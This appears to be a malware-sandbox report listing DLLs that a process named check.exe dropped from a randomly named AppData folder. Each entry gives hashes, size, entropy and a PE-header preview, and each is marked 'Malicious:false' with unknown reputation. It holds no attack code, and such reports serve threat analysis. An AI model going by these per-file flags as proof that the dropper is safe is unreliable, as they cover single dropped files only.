                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3591664
                                                                                                                                                                                                            Entropy (8bit):6.333693598000157
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
                                                                                                                                                                                                            MD5:D055566B5168D7B1D4E307C41CE47C4B
                                                                                                                                                                                                            SHA1:043C0056E9951DA79EC94A66A784972532DC18EF
                                                                                                                                                                                                            SHA-256:30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
                                                                                                                                                                                                            SHA-512:4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):438768
                                                                                                                                                                                                            Entropy (8bit):6.312090336793804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
                                                                                                                                                                                                            MD5:2030C4177B499E6118BE5B9E5761FCE1
                                                                                                                                                                                                            SHA1:050D0E67C4AA890C80F46CF615431004F2F4F8FC
                                                                                                                                                                                                            SHA-256:51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
                                                                                                                                                                                                            SHA-512:488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4148720
                                                                                                                                                                                                            Entropy (8bit):6.462183686222023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                            MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                            SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                            SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                            SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330736
                                                                                                                                                                                                            Entropy (8bit):6.381828869454302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                            MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                            SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                            SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                            SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149488
                                                                                                                                                                                                            Entropy (8bit):6.116105454277536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                            MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                            SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                            SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                            SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5498352
                                                                                                                                                                                                            Entropy (8bit):6.619117060971844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                            MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                            SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                            SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                            SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101872
                                                                                                                                                                                                            Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                            MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                            SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                            SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                            SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44528
                                                                                                                                                                                                            Entropy (8bit):6.627837381503075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                            MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                            SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                            SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                            SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4173928
                                                                                                                                                                                                            Entropy (8bit):6.329102290474506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                            MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                            SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                            SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                            SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25072
                                                                                                                                                                                                            Entropy (8bit):5.961464514165753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                            MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                            SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                            SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                            SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3385328
                                                                                                                                                                                                            Entropy (8bit):6.382356347494905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                            MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                            SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                            SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                            SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20923392
                                                                                                                                                                                                            Entropy (8bit):6.255903817217008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                            MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                            SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                            SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                            SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68080
                                                                                                                                                                                                            Entropy (8bit):6.207162014262433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                            MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                            SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                            SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                            SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41968
                                                                                                                                                                                                            Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                            MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                            SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                            SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                            SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39408
                                                                                                                                                                                                            Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                            MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                            SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                            SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                            SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45040
                                                                                                                                                                                                            Entropy (8bit):6.016125225197622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                            MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                            SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                            SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                            SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38384
                                                                                                                                                                                                            Entropy (8bit):5.957072398645384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                            MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                            SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                            SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                            SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
